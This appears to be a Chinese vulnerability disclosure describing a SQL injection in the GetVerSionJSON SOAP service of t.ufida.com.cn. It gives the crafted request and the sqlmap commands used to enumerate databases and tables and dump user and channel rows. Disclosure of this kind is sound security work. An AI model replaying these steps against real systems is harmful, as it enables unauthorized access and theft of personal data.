### 简要描述: 服务接口存在sql注射漏洞,泄漏全国渠道和用户信息 ### 详细说明: 1、访问http://t.ufida.com.cn/,发现存在大量的开放接口,对其中的GetVerSionJSON进行测试,发现存在sql注射漏洞。 [<img src="https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg) 2、注入的请求内容如下: ``` POST /Service.asmx HTTP/1.1 Host: t.ufida.com.cn Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/GetVerSionJSON" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetVerSionJSON xmlns="http://tempuri.org/"> <Product>u8 *</Product> </GetVerSionJSON> </soap:Body> </soap:Envelope> ``` 执行 ``` sqlmap -r /root/p.txt ``` ,截图如下: [<img...
### 简要描述: 服务接口存在sql注射漏洞,泄漏全国渠道和用户信息 ### 详细说明: 1、访问http://t.ufida.com.cn/,发现存在大量的开放接口,对其中的GetVerSionJSON进行测试,发现存在sql注射漏洞。 [<img src="https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg) 2、注入的请求内容如下: ``` POST /Service.asmx HTTP/1.1 Host: t.ufida.com.cn Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/GetVerSionJSON" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetVerSionJSON xmlns="http://tempuri.org/"> <Product>u8 *</Product> </GetVerSionJSON> </soap:Body> </soap:Envelope> ``` 执行 ``` sqlmap -r /root/p.txt ``` ,截图如下: [<img src="https://images.seebug.org/upload/201505/23205621f832ea7a18db031d881780399e5daab3.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/23205621f832ea7a18db031d881780399e5daab3.jpg) 3、列库、表、内容等 ``` sqlmap -r /root/p.txt --dbs ``` ``` available databases [9]: [*] fwsbm [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] tong [*] tongtest ``` 列表: ``` sqlmap -r /root/p.txt -D tong --tables ``` Database: tong [163 tables] +-------------------------+ | Alert | | All_user | | Business | | CModule | | Cnewsweb | | D99_CMD | | D99_Tmp | | DBName | | DD_821 | | DD_821s | | DD_850 | | DD_850s | | Demo | | IM_message | …… 列表的内容: ``` sqlmap -r /root/p.txt -D tong -T ytqdxx --dump --start 1 --stop 10 ``` [<img src="https://images.seebug.org/upload/201505/23210136012ee4dcfa629ab536182bf41e022ba5.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/23210136012ee4dcfa629ab536182bf41e022ba5.jpg) ### 漏洞证明: 参考截图证明